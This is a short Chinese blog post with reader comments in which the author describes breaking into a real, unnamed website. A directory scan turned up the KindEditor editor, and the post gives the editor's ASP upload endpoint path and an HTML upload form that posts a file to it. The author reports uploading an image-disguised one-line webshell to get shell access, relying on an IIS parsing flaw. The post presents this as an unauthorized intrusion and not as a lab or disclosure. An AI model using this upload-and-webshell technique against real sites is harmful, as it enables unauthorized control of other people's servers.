某站,经测试发现存在 IIS 解析漏洞,且支持PHP
该站程序基于 ACTCMS 可以找 0day 来渗透,但是既然发现了解析漏洞,那么也不能那么简单就放弃掉这个突破点,
网站前台并没有发现上传点,所以换了个思路,用御剑扫出来 KindEditor 编辑器,然后百度了下该编辑器,得到 KindEditor 上传后端处理地址:/editor/kindeditor/asp/upload_json.asp?dir=image
编写上传表单:
<body> <form action="http://xx/editor/kindeditor/asp/upload_json.asp?dir=image" method="post" enctype="multipart/form-data"> <input type="file" name="imgFile" /> <input type="submit" value="上传文件" /> </form> </body>
通过上传表单成功上传图片一句话,成功 getshell
总结一下:好吧,么有总结,其实就是随便发个文章凑下内容的啦。。
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,think you !
本文作者为Mr.Wu,转载请注明。
求大佬的御剑字典 看数量就好给力
@蚂蚁但是御剑并不给力
@Mr.Wu御剑搞小站不错,这种扫目录的以前搞ASP很给力。只是现在不行了 WAF太多。还是求大佬的字典303523250@qq.com
同时支持asp和PHP?
@hello[aru_2] 不然呢?IIS解析漏洞了解一下
可以 可以